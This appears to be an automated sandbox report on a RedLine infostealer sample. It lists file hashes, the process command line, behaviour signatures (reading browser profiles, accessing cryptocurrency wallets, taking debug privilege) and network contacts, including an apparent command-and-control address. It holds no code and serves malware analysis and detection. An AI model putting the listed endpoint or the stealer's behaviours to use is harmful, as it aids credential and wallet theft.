SHA512 b341971b12d9b46743bc8c4e96c62ce7a0b4cc7c76c91777e5119b3191d18385a1ffe0328d357a7e53d950653d83f7b6137d3d1d8f21eb03d667ec4b4101d5ce

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\056093a36a95204b_0

MD5 cc6d9e1bac3582cace262aab7daf65ab
SHA1 39305e504c802a608a3a98f6b055fbdf9ce180a7
SHA256 bef81447cbb6f38cd9902cb87c742e6f7b5add88b245a467cab96d48ef07e729
SHA512 57ae699e033dd8d5bf68942d637529ac77cf79b1d5aaf17fde7f0972f3dbf0ce47e0eefe685de44fb48341e38eb03950f4b21a58b016951f024ac409bb32e037

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\index

MD5 5a9b72cea8937c5c18ef576938e400d6
SHA1 6a65f213fb0a4fd6941c4b6d00489fc4a42f69ca
SHA256 54d6688b35939b718fe514d9d9652dba6b04dcb120ee21dc37702491ae7ffb4b
SHA512 a31885caadbff3261a7078d7c180009b4fcdd6d3260b1af9a6437337a2a84eea8f4418195e6ff0f18045b4939a2bc8311751a4142ce4fc6b37bb7d68fd38313d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_00000c

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_00000b

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_00000a

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000009

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000008

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000007

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000006

MD5 32fe4f6c44f67afd758815b62ed06a10
SHA1 e52eb498d560e68aa0c9803ba993bbfdda76800e
SHA256 11a424b982a53cb734c97fa266be0067f086c203cf5b9549e66f1d81fe7cd488
SHA512 ab998d0d95f6ac6702c01c217a034f0353865d609c373225371664fb88c5f047b45c32fd9db3440c2fd2c6fcacdb3a1a8c491b5df6868a1d8d0b05f617f601f7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000005

MD5 effdaa6b3be2d9c9a7afbb9dbfc01491
SHA1 3951180ae088ab3e0deeece4c08c599251cf6ad6
SHA256 21dc237cc35a3c95a1e19d9d79fd65639cdba3e6d0803f47807971aa2a7d060f
SHA512 815ae667d99043f74ec389d9be9a74d8134452090e6d4692882ec947d728b5f6a852b7ec4fd6885e6b3e84cc90abe8fc5aaf3b469056c74803f58e92d0733c37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000004

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000003

MD5 a85760e677d33a66159db7acca59cf1a
SHA1 a88c27ae4a2dcf3078e57258912531287820492d
SHA256 f2b878fa60d99ed05ffa4fd136b2ec173e54b92e6da4bcbdf476b522b237410c
SHA512 f6e588a499d59f00941a48e70d03e232b551355bb7317f48251b49e72f5b1e52102b9e66dc4cc5106b4521673bcd8b404990b276dfaf1a4aa771d125cf5327db

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 18:28

Reported

2023-08-10 18:30

Platform

win10v2004-20230703-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

Signatures

RedLine

infostealer redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

Network

Country  Destination           Domain                         Proto
US       8.8.8.8:53            59.128.231.4.in-addr.arpa      udp
US       8.8.8.8:53            126.133.241.8.in-addr.arpa     udp
NL       136.244.98.226:33587  N/A                            tcp
US       8.8.8.8:53            108.211.229.192.in-addr.arpa   udp
US       8.8.8.8:53            226.98.244.136.in-addr.arpa    udp
US       8.8.8.8:53            18.31.95.13.in-addr.arpa       udp
US       8.8.8.8:53            153.141.79.40.in-addr.arpa     udp

Files

memory/4844-133-0x00000000007A0000-0x00000000007D4000-memory.dmp

memory/4844-134-0x0000000074930000-0x00000000750E0000-memory.dmp

memory/4844-135-0x0000000005870000-0x0000000005E88000-memory.dmp

memory/4844-136-0x0000000005360000-0x000000000546A000-memory.dmp

memory/4844-138-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4844-137-0x0000000005270000-0x0000000005282000-memory.dmp

memory/4844-139-0x00000000052D0000-0x000000000530C000-memory.dmp

memory/4844-140-0x00000000055E0000-0x0000000005656000-memory.dmp

memory/4844-141-0x0000000005700000-0x0000000005792000-memory.dmp

memory/4844-142-0x0000000006930000-0x0000000006ED4000-memory.dmp

memory/4844-143-0x00000000057A0000-0x0000000005806000-memory.dmp

memory/4844-144-0x0000000074930000-0x00000000750E0000-memory.dmp

memory/4844-145-0x0000000006650000-0x0000000006812000-memory.dmp

memory/4844-146-0x0000000008B00000-0x000000000902C000-memory.dmp

memory/4844-147-0x0000000006870000-0x00000000068C0000-memory.dmp

memory/4844-148-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4844-150-0x0000000074930000-0x00000000750E0000-memory.dmp